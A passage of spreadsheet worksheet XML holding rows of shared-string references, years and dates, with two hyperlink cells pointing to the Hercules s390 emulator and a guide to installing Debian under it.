      <c r="ABW71" s="9"/>
      <c r="ABX71" s="9"/>
      <c r="ABY71" s="9"/>
      <c r="ABZ71" s="9"/>
      <c r="ACA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="ACB71" s="7"/>
      <c r="ACC71" s="6"/>
      <c r="ACD71" s="6"/>
      <c r="ACE71" s="6"/>
      <c r="ACF71" s="6"/>
      <c r="ACG71" s="6"/>
      <c r="ACH71" s="6"/>
      <c r="ACI71" s="8"/>
      <c r="ACJ71" s="8"/>
      <c r="ACK71" s="9"/>
      <c r="ACL71" s="9"/>
      <c r="ACM71" s="9"/>
      <c r="ACN71" s="9"/>
      <c r="ACO71" s="9"/>
      <c r="ACP71" s="9"/>
      <c r="ACQ71" s="9"/>
      <c r="ACR71" s="9"/>
      <c r="ACS71" s="9"/>
      <c r="ACT71" s="9"/>
      <c r="ACU71" s="9"/>
      <c r="ACV71" s="9"/>
      <c r="ACW71" s="9"/>
      <c r="ACX71" s="9"/>
      <c r="ACY71" s="9"/>
      <c r="ACZ71" s="9"/>
      <c r="ADA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="ADB71" s="7"/>
      <c r="ADC71" s="6"/>
      <c r="ADD71" s="6"/>
      <c r="ADE71" s="6"/>
      <c r="ADF71" s="6"/>
      <c r="ADG71" s="6"/>
      <c r="ADH71" s="6"/>
      <c r="ADI71" s="8"/>
      <c r="ADJ71" s="8"/>
      <c r="ADK71" s="9"/>
      <c r="ADL71" s="9"/>
      <c r="ADM71" s="9"/>
      <c r="ADN71" s="9"/>
      <c r="ADO71" s="9"/>
      <c r="ADP71" s="9"/>
      <c r="ADQ71" s="9"/>
      <c r="ADR71" s="9"/>
      <c r="ADS71" s="9"/>
      <c r="ADT71" s="9"/>
      <c r="ADU71" s="9"/>
      <c r="ADV71" s="9"/>
      <c r="ADW71" s="9"/>
      <c r="ADX71" s="9"/>
      <c r="ADY71" s="9"/>
      <c r="ADZ71" s="9"/>
      <c r="AEA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AEB71" s="7"/>
      <c r="AEC71" s="6"/>
      <c r="AED71" s="6"/>
      <c r="AEE71" s="6"/>
      <c r="AEF71" s="6"/>
      <c r="AEG71" s="6"/>
      <c r="AEH71" s="6"/>
      <c r="AEI71" s="8"/>
      <c r="AEJ71" s="8"/>
      <c r="AEK71" s="9"/>
      <c r="AEL71" s="9"/>
      <c r="AEM71" s="9"/>
      <c r="AEN71" s="9"/>
      <c r="AEO71" s="9"/>
      <c r="AEP71" s="9"/>
      <c r="AEQ71" s="9"/>
      <c r="AER71" s="9"/>
      <c r="AES71" s="9"/>
      <c r="AET71" s="9"/>
      <c r="AEU71" s="9"/>
      <c r="AEV71" s="9"/>
      <c r="AEW71" s="9"/>
      <c r="AEX71" s="9"/>
      <c r="AEY71" s="9"/>
      <c r="AEZ71" s="9"/>
      <c r="AFA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AFB71" s="7"/>
      <c r="AFC71" s="6"/>
      <c r="AFD71" s="6"/>
      <c r="AFE71" s="6"/>
      <c r="AFF71" s="6"/>
      <c r="AFG71" s="6"/>
      <c r="AFH71" s="6"/>
      <c r="AFI71" s="8"/>
      <c r="AFJ71" s="8"/>
      <c r="AFK71" s="9"/>
      <c r="AFL71" s="9"/>
      <c r="AFM71" s="9"/>
      <c r="AFN71" s="9"/>
      <c r="AFO71" s="9"/>
      <c r="AFP71" s="9"/>
      <c r="AFQ71" s="9"/>
      <c r="AFR71" s="9"/>
      <c r="AFS71" s="9"/>
      <c r="AFT71" s="9"/>
      <c r="AFU71" s="9"/>
      <c r="AFV71" s="9"/>
      <c r="AFW71" s="9"/>
      <c r="AFX71" s="9"/>
      <c r="AFY71" s="9"/>
      <c r="AFZ71" s="9"/>
      <c r="AGA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AGB71" s="7"/>
      <c r="AGC71" s="6"/>
      <c r="AGD71" s="6"/>
      <c r="AGE71" s="6"/>
      <c r="AGF71" s="6"/>
      <c r="AGG71" s="6"/>
      <c r="AGH71" s="6"/>
      <c r="AGI71" s="8"/>
      <c r="AGJ71" s="8"/>
      <c r="AGK71" s="9"/>
      <c r="AGL71" s="9"/>
      <c r="AGM71" s="9"/>
      <c r="AGN71" s="9"/>
      <c r="AGO71" s="9"/>
      <c r="AGP71" s="9"/>
      <c r="AGQ71" s="9"/>
      <c r="AGR71" s="9"/>
      <c r="AGS71" s="9"/>
      <c r="AGT71" s="9"/>
      <c r="AGU71" s="9"/>
      <c r="AGV71" s="9"/>
      <c r="AGW71" s="9"/>
      <c r="AGX71" s="9"/>
      <c r="AGY71" s="9"/>
      <c r="AGZ71" s="9"/>
      <c r="AHA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AHB71" s="7"/>
      <c r="AHC71" s="6"/>
      <c r="AHD71" s="6"/>
      <c r="AHE71" s="6"/>
      <c r="AHF71" s="6"/>
      <c r="AHG71" s="6"/>
      <c r="AHH71" s="6"/>
      <c r="AHI71" s="8"/>
      <c r="AHJ71" s="8"/>
      <c r="AHK71" s="9"/>
      <c r="AHL71" s="9"/>
      <c r="AHM71" s="9"/>
      <c r="AHN71" s="9"/>
      <c r="AHO71" s="9"/>
      <c r="AHP71" s="9"/>
      <c r="AHQ71" s="9"/>
      <c r="AHR71" s="9"/>
      <c r="AHS71" s="9"/>
      <c r="AHT71" s="9"/>
      <c r="AHU71" s="9"/>
      <c r="AHV71" s="9"/>
      <c r="AHW71" s="9"/>
      <c r="AHX71" s="9"/>
      <c r="AHY71" s="9"/>
      <c r="AHZ71" s="9"/>
      <c r="AIA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AIB71" s="7"/>
      <c r="AIC71" s="6"/>
      <c r="AID71" s="6"/>
      <c r="AIE71" s="6"/>
      <c r="AIF71" s="6"/>
      <c r="AIG71" s="6"/>
      <c r="AIH71" s="6"/>
      <c r="AII71" s="8"/>
      <c r="AIJ71" s="8"/>
      <c r="AIK71" s="9"/>
      <c r="AIL71" s="9"/>
      <c r="AIM71" s="9"/>
      <c r="AIN71" s="9"/>
      <c r="AIO71" s="9"/>
      <c r="AIP71" s="9"/>
      <c r="AIQ71" s="9"/>
      <c r="AIR71" s="9"/>
      <c r="AIS71" s="9"/>
      <c r="AIT71" s="9"/>
      <c r="AIU71" s="9"/>
      <c r="AIV71" s="9"/>
      <c r="AIW71" s="9"/>
      <c r="AIX71" s="9"/>
      <c r="AIY71" s="9"/>
      <c r="AIZ71" s="9"/>
      <c r="AJA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AJB71" s="7"/>
      <c r="AJC71" s="6"/>
      <c r="AJD71" s="6"/>
      <c r="AJE71" s="6"/>
      <c r="AJF71" s="6"/>
      <c r="AJG71" s="6"/>
      <c r="AJH71" s="6"/>
      <c r="AJI71" s="8"/>
      <c r="AJJ71" s="8"/>
      <c r="AJK71" s="9"/>
      <c r="AJL71" s="9"/>
      <c r="AJM71" s="9"/>
      <c r="AJN71" s="9"/>
      <c r="AJO71" s="9"/>
      <c r="AJP71" s="9"/>
      <c r="AJQ71" s="9"/>
      <c r="AJR71" s="9"/>
      <c r="AJS71" s="9"/>
      <c r="AJT71" s="9"/>
      <c r="AJU71" s="9"/>
      <c r="AJV71" s="9"/>
      <c r="AJW71" s="9"/>
      <c r="AJX71" s="9"/>
      <c r="AJY71" s="9"/>
      <c r="AJZ71" s="9"/>
      <c r="AKA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AKB71" s="7"/>
      <c r="AKC71" s="6"/>
      <c r="AKD71" s="6"/>
      <c r="AKE71" s="6"/>
      <c r="AKF71" s="6"/>
      <c r="AKG71" s="6"/>
      <c r="AKH71" s="6"/>
      <c r="AKI71" s="8"/>
      <c r="AKJ71" s="8"/>
      <c r="AKK71" s="9"/>
      <c r="AKL71" s="9"/>
      <c r="AKM71" s="9"/>
      <c r="AKN71" s="9"/>
      <c r="AKO71" s="9"/>
      <c r="AKP71" s="9"/>
      <c r="AKQ71" s="9"/>
      <c r="AKR71" s="9"/>
      <c r="AKS71" s="9"/>
      <c r="AKT71" s="9"/>
      <c r="AKU71" s="9"/>
      <c r="AKV71" s="9"/>
      <c r="AKW71" s="9"/>
      <c r="AKX71" s="9"/>
      <c r="AKY71" s="9"/>
      <c r="AKZ71" s="9"/>
      <c r="ALA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="ALB71" s="7"/>
      <c r="ALC71" s="6"/>
      <c r="ALD71" s="6"/>
      <c r="ALE71" s="6"/>
      <c r="ALF71" s="6"/>
      <c r="ALG71" s="6"/>
      <c r="ALH71" s="6"/>
      <c r="ALI71" s="8"/>
      <c r="ALJ71" s="8"/>
      <c r="ALK71" s="9"/>
      <c r="ALL71" s="9"/>
      <c r="ALM71" s="9"/>
      <c r="ALN71" s="9"/>
      <c r="ALO71" s="9"/>
      <c r="ALP71" s="9"/>
      <c r="ALQ71" s="9"/>
      <c r="ALR71" s="9"/>
      <c r="ALS71" s="9"/>
      <c r="ALT71" s="9"/>
      <c r="ALU71" s="9"/>
      <c r="ALV71" s="9"/>
      <c r="ALW71" s="9"/>
      <c r="ALX71" s="9"/>
      <c r="ALY71" s="9"/>
      <c r="ALZ71" s="9"/>
      <c r="AMA71" s="9"/>
      <c r="AMB71" s="9"/>
      <c r="AMC71" s="9"/>
      <c r="AMD71" s="9"/>
      <c r="AME71" s="9"/>
      <c r="AMF71" s="9"/>
      <c r="AMG71" s="9"/>
      <c r="AMH71" s="9"/>
      <c r="AMI71" s="9"/>
      <c r="AMJ71" s="9"/>
      <c r="AMK71" s="9"/>
    </row>
    <row r="72">
      <c r="A72" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B72" s="40">
        <v>2014.0</v>
      </c>
      <c r="C72" s="52" t="s">
        <v>1162</v>
      </c>
      <c r="D72" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E72" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F72" s="91" t="s">
        <v>1165</v>
      </c>
      <c r="G72" s="48" t="s">
        <v>1172</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B73" s="43">
        <v>2014.0</v>
      </c>
      <c r="C73" s="5" t="s">
        <v>1177</v>
      </c>
      <c r="D73" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E73" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F73" s="5" t="s">
        <v>1180</v>
      </c>
      <c r="G73" s="5" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B74" s="40">
        <v>2014.0</v>
      </c>
      <c r="C74" s="40" t="s">
        <v>1190</v>
      </c>
      <c r="D74" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E74" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F74" s="40" t="s">
        <v>130</v>
      </c>
      <c r="G74" s="40" t="s">
        <v>1194</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B75" s="40">
        <v>2014.0</v>
      </c>
      <c r="C75" s="40" t="s">
        <v>1204</v>
      </c>
      <c r="D75" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F75" s="40" t="s">
        <v>1207</v>
      </c>
      <c r="G75" s="40" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B76" s="40">
        <v>2014.0</v>
      </c>
      <c r="C76" s="40" t="s">
        <v>1213</v>
      </c>
      <c r="D76" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E76" s="40" t="s">
        <v>300</v>
      </c>
      <c r="F76" s="40" t="s">
        <v>1214</v>
      </c>
      <c r="G76" s="40" t="s">
        <v>1215</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="86" t="s">
        <v>578</v>
      </c>
      <c r="B77" s="87">
        <v>2014.0</v>
      </c>
      <c r="C77" s="86" t="s">
        <v>1221</v>
      </c>
      <c r="D77" s="86" t="s">
        <v>48</v>
      </c>
      <c r="E77" s="86" t="s">
        <v>1222</v>
      </c>
      <c r="F77" s="86" t="s">
        <v>1223</v>
      </c>
      <c r="G77" s="48" t="s">
        <v>1225</v>
      </c>
      <c r="H77" s="86" t="s">
        <v>1226</v>
      </c>
      <c r="I77" s="30"/>
      <c r="J77" s="30"/>
      <c r="K77" s="30"/>
      <c r="L77" s="30"/>
      <c r="M77" s="30"/>
      <c r="N77" s="30"/>
      <c r="O77" s="30"/>
      <c r="P77" s="30"/>
      <c r="Q77" s="30"/>
      <c r="R77" s="30"/>
      <c r="S77" s="30"/>
      <c r="T77" s="30"/>
      <c r="U77" s="30"/>
      <c r="V77" s="30"/>
      <c r="W77" s="30"/>
      <c r="X77" s="30"/>
      <c r="Y77" s="30"/>
      <c r="Z77" s="30"/>
    </row>
    <row r="78">
      <c r="A78" s="40" t="s">
        <v>1227</v>
      </c>
      <c r="B78" s="40">
        <v>2016.0</v>
      </c>
      <c r="C78" s="40" t="s">
        <v>1228</v>
      </c>
      <c r="D78" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E78" s="40" t="s">
        <v>300</v>
      </c>
      <c r="F78" s="40" t="s">
        <v>1229</v>
      </c>
      <c r="G78" s="40" t="s">
        <v>1231</v>
      </c>
      <c r="H78" s="40" t="s">
        <v>1232</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B79" s="43">
        <v>2014.0</v>
      </c>
      <c r="C79" s="5" t="s">
        <v>1237</v>
      </c>
      <c r="D79" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E79" s="5" t="s">
        <v>232</v>
      </c>
      <c r="F79" s="5" t="s">
        <v>1238</v>
      </c>
      <c r="G79" s="5" t="s">
        <v>130</v>
      </c>
      <c r="H79" s="5" t="s">
        <v>1239</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="17">
        <v>42528.0</v>
      </c>
      <c r="B80" s="7"/>
      <c r="C80" s="6"/>
      <c r="D80" s="6"/>
      <c r="E80" s="6"/>
      <c r="F80" s="6"/>
      <c r="G80" s="6"/>
      <c r="H80" s="6"/>
      <c r="I80" s="8"/>
      <c r="J80" s="8"/>
      <c r="K80" s="9"/>
      <c r="L80" s="9"/>
      <c r="M80" s="9"/>
      <c r="N80" s="9"/>
      <c r="O80" s="9"/>
      <c r="P80" s="9"/>
      <c r="Q80" s="9"/>
      <c r="R80" s="9"/>
      <c r="S80" s="9"/>
      <c r="T80" s="9"/>
      <c r="U80" s="9"/>
      <c r="V80" s="9"/>
      <c r="W80" s="9"/>
      <c r="X80" s="9"/>
      <c r="Y80" s="9"/>
      <c r="Z80" s="9"/>
    </row>
    <row r="81">
      <c r="A81" s="30" t="s">
        <v>1245</v>
      </c>
      <c r="B81" s="31">
        <v>2014.0</v>
      </c>
      <c r="C81" s="30" t="s">
        <v>1246</v>
      </c>
      <c r="D81" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E81" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F81" s="35" t="s">
        <v>1247</v>
      </c>
      <c r="G81" s="35" t="s">
        <v>1248</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B82" s="40">
        <v>2014.0</v>
      </c>
      <c r="C82" s="40" t="s">
        <v>1250</v>
      </c>
      <c r="D82" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F82" s="40" t="s">
        <v>1254</v>
      </c>
      <c r="G82" s="94" t="s">
        <v>1255</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B83" s="31">
        <v>2014.0</v>
      </c>
      <c r="C83" s="30" t="s">
        <v>1296</v>
      </c>
      <c r="D83" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E83" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F83" s="35" t="s">
        <v>1299</v>
      </c>
      <c r="G83" s="35" t="s">
        <v>1299</v>
      </c>
      <c r="H83" s="30"/>
      <c r="I83" s="30"/>
      <c r="J83" s="30"/>
    </row>
    <row r="84">
      <c r="A84" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B84" s="31">
        <v>2014.0</v>
      </c>
      <c r="C84" s="30" t="s">
        <v>1313</v>
      </c>
      <c r="D84" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E84" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F84" s="30" t="s">
        <v>1316</v>
      </c>
      <c r="G84" s="35" t="s">
        <v>1321</v>
      </c>
      <c r="H84" s="30" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B85" s="40">
        <v>2014.0</v>
      </c>
      <c r="C85" s="40" t="s">
        <v>1333</v>
      </c>
      <c r="D85" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E85" s="40" t="s">
        <v>676</v>
      </c>
      <c r="F85" s="40" t="s">
        <v>1337</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B86" s="40">
        <v>2014.0</v>
      </c>
      <c r="C86" s="40" t="s">
        <v>1344</v>
      </c>
      <c r="D86" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E86" s="40" t="s">
        <v>676</v>
      </c>
      <c r="F86" s="40" t="s">
        <v>1347</v>
      </c>
      <c r="G86" s="51" t="s">
        <v>1349</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B87" s="40">
        <v>2014.0</v>
      </c>
      <c r="C87" s="40" t="s">
        <v>1354</v>
      </c>
      <c r="D87" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E87" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F87" s="40" t="s">
        <v>130</v>
      </c>
      <c r="G87" s="40" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B88" s="40">
        <v>2014.0</v>
      </c>
      <c r="C88" s="40" t="s">
        <v>1359</v>
      </c>
      <c r="D88" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E88" s="40" t="s">
        <v>1360</v>
      </c>
      <c r="F88" s="40" t="s">
        <v>1362</v>
      </c>
      <c r="G88" s="40" t="s">
        <v>1364</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B89" s="43">
        <v>2015.0</v>
      </c>
      <c r="C89" s="5" t="s">
        <v>1373</v>
      </c>
      <c r="D89" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E89" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F89" s="5" t="s">
        <v>1374</v>
      </c>
      <c r="G89" s="5" t="s">
        <v>130</v>
      </c>
      <c r="H89" s="3"/>
    </row>
    <row r="90">
      <c r="A90" s="60" t="s">
        <v>673</v>
      </c>
      <c r="B90" s="43">
        <v>2015.0</v>
      </c>
      <c r="C90" s="5" t="s">
        <v>1378</v>
      </c>
      <c r="D90" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E90" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F90" s="5" t="s">
        <v>1379</v>
      </c>
      <c r="G90" s="5" t="s">
        <v>1380</v>
      </c>
      <c r="H90" s="3"/>
    </row>
    <row r="91">
      <c r="A91" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B91" s="43">
        <v>2015.0</v>
      </c>
      <c r="C91" s="5" t="s">
        <v>1384</v>
      </c>
      <c r="D91" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E91" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F91" s="5" t="s">
        <v>1385</v>
      </c>
      <c r="G91" s="48" t="s">
        <v>1386</v>
      </c>
      <c r="H91" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B92" s="43">
        <v>2015.0</v>
      </c>
      <c r="C92" s="5" t="s">
        <v>1277</v>
      </c>
      <c r="D92" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E92" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F92" s="5" t="s">
        <v>1374</v>
      </c>
      <c r="G92" s="5" t="s">
        <v>679</v>
      </c>
      <c r="H92" s="3"/>
    </row>
    <row r="93">
      <c r="A93" s="17">
        <v>42535.0</v>
      </c>
      <c r="B93" s="7"/>
      <c r="C93" s="6"/>
      <c r="D93" s="6"/>
      <c r="E93" s="6"/>
      <c r="F93" s="6"/>
      <c r="G93" s="6"/>
      <c r="H93" s="6"/>
      <c r="I93" s="8"/>
      <c r="J93" s="8"/>
      <c r="K93" s="9"/>
      <c r="L93" s="9"/>
      <c r="M93" s="9"/>
      <c r="N93" s="9"/>
      <c r="O93" s="9"/>
      <c r="P93" s="9"/>
      <c r="Q93" s="9"/>
      <c r="R93" s="9"/>
      <c r="S93" s="9"/>
      <c r="T93" s="9"/>
      <c r="U93" s="9"/>
      <c r="V93" s="9"/>
      <c r="W93" s="9"/>
      <c r="X93" s="9"/>
      <c r="Y93" s="9"/>
      <c r="Z93" s="9"/>
    </row>
    <row r="94">
      <c r="A94" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B94" s="31">
        <v>2015.0</v>
      </c>
      <c r="C94" s="30" t="s">
        <v>1394</v>
      </c>
      <c r="D94" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E94" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F94" s="35" t="s">
        <v>1396</v>
      </c>
      <c r="G94" s="35" t="s">
        <v>1398</v>
      </c>
      <c r="H94" s="30" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B95" s="31">
        <v>2015.0</v>
      </c>
      <c r="C95" s="30" t="s">
        <v>1406</v>
      </c>
      <c r="D95" s="35" t="s">
        <v>128</v>
      </c>
      <c r="E95" s="34" t="s">
        <v>1407</v>
      </c>
      <c r="F95" s="35" t="s">
        <v>1408</v>
      </c>
      <c r="G95" s="48" t="s">
        <v>1409</v>
      </c>
      <c r="H95" s="30" t="s">
        <v>1410</v>
      </c>
      <c r="I95" s="30"/>
      <c r="J95" s="30"/>
    </row>
    <row r="96">
      <c r="A96" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B96" s="31">
        <v>2015.0</v>
      </c>
      <c r="C96" s="30" t="s">
        <v>1415</v>
      </c>
      <c r="D96" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E96" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F96" s="35" t="s">
        <v>1417</v>
      </c>
      <c r="G96" s="35" t="s">
        <v>1419</v>
      </c>
      <c r="H96" s="30" t="s">
        <v>1420</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B97" s="31">
        <v>2015.0</v>
      </c>
      <c r="C97" s="30" t="s">
        <v>288</v>
      </c>
      <c r="D97" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E97" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F97" s="35" t="s">
        <v>1437</v>
      </c>
      <c r="G97" s="32" t="s">
        <v>1439</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B98" s="31">
        <v>2015.0</v>
      </c>
      <c r="C98" s="30" t="s">
        <v>1449</v>
      </c>
      <c r="D98" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E98" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F98" s="35" t="s">
        <v>1452</v>
      </c>
      <c r="G98" s="35" t="s">
        <v>1454</v>
      </c>
      <c r="H98" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B99" s="31">
        <v>2014.0</v>
      </c>
      <c r="C99" s="30" t="s">
        <v>1466</v>
      </c>
      <c r="D99" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E99" s="30" t="s">
        <v>1467</v>
      </c>
      <c r="F99" s="35" t="s">
        <v>1468</v>
      </c>
      <c r="G99" s="35" t="s">
        <v>1470</v>
      </c>
      <c r="H99" s="33" t="str">
        <f>HYPERLINK("http://www.hercules-390.org/","Hercules s390 emulator")</f>
        <v>Hercules s390 emulator</v>
      </c>
      <c r="I99" s="33" t="str">
        <f>HYPERLINK("http://www.josefsipek.net/docs/s390-linux/hercules-s390.html","Install Debian Under Hercules")</f>
        <v>Install Debian Under Hercules</v>
      </c>
      <c r="J99" s="30"/>
    </row>
    <row r="100">
      <c r="A100" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B100" s="43">
        <v>2015.0</v>
      </c>
      <c r="C100" s="5" t="s">
        <v>1488</v>
      </c>
      <c r="D100" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E100" s="5" t="s">
        <v>1489</v>
      </c>
      <c r="F100" s="5" t="s">
        <v>1490</v>
      </c>
      <c r="G100" s="5" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B101" s="40">
        <v>2014.0</v>
      </c>
      <c r="C101" s="40" t="s">
        <v>1491</v>
      </c>
      <c r="D101" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E101" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F101" s="40" t="s">
        <v>1492</v>
      </c>
      <c r="G101" s="40" t="s">
        <v>1493</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B102" s="40">
        <v>2014.0</v>
      </c>
      <c r="C102" s="40" t="s">
        <v>1495</v>
      </c>
      <c r="D102" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E102" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F102" s="40" t="s">
        <v>130</v>
      </c>
      <c r="G102" s="40" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B103" s="43">
        <v>2015.0</v>
      </c>
      <c r="C103" s="5" t="s">
        <v>1496</v>
      </c>
      <c r="D103" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E103" s="5" t="s">
        <v>1497</v>
      </c>
      <c r="F103" s="5" t="s">
        <v>1498</v>
      </c>
      <c r="G103" s="5" t="s">
        <v>1499</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B104" s="43">
        <v>2015.0</v>
      </c>
      <c r="C104" s="5" t="s">
        <v>1502</v>
      </c>
      <c r="D104" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E104" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F104" s="5" t="s">
        <v>1504</v>
      </c>
      <c r="G104" s="5" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B105" s="43">
        <v>2015.0</v>
      </c>
      <c r="C105" s="5" t="s">
        <v>1512</v>
      </c>
      <c r="D105" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E105" s="5" t="s">
        <v>232</v>
      </c>
      <c r="F105" s="5" t="s">
        <v>1513</v>
      </c>
      <c r="G105" s="48" t="s">
        <v>1514</v>
      </c>
      <c r="H105" s="40" t="s">
        <v>1515</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B106" s="43">
        <v>2015.0</v>
      </c>
      <c r="C106" s="5" t="s">
        <v>1521</v>
      </c>
      <c r="D106" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E106" s="5" t="s">
        <v>232</v>
      </c>
      <c r="F106" s="5" t="s">
        <v>1513</v>
      </c>
      <c r="G106" s="5" t="s">
        <v>1523</v>
      </c>
      <c r="H106" s="40" t="s">
        <v>1525</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="17">
        <v>42538.0</v>
      </c>
      <c r="B107" s="7"/>
      <c r="C107" s="6"/>
      <c r="D107" s="6"/>
      <c r="E107" s="6"/>
      <c r="F107" s="6"/>
      <c r="G107" s="6"/>
      <c r="H107" s="6"/>
      <c r="I107" s="8"/>
      <c r="J107" s="8"/>
      <c r="K107" s="9"/>
      <c r="L107" s="9"/>
      <c r="M107" s="9"/>
      <c r="N107" s="9"/>
      <c r="O107" s="9"/>
      <c r="P107" s="9"/>
      <c r="Q107" s="9"/>
      <c r="R107" s="9"/>
      <c r="S107" s="9"/>
      <c r="T107" s="9"/>
      <c r="U107" s="9"/>
      <c r="V107" s="9"/>
      <c r="W107" s="9"/>
      <c r="X107" s="9"/>
      <c r="Y107" s="9"/>
      <c r="Z107" s="9"/>
    </row>
    <row r="108">
      <c r="A108" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B108" s="43">
        <v>2015.0</v>
      </c>
      <c r="C108" s="5" t="s">
        <v>1534</v>
      </c>
      <c r="D108" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E108" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F108" s="5" t="s">
        <v>1536</v>
      </c>
      <c r="G108" s="5" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="37">
        <v>9447.0</v>
      </c>
      <c r="B109" s="40">
        <v>2015.0</v>
      </c>
      <c r="C109" s="40" t="s">
        <v>1541</v>
      </c>
      <c r="D109" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F109" s="40" t="s">
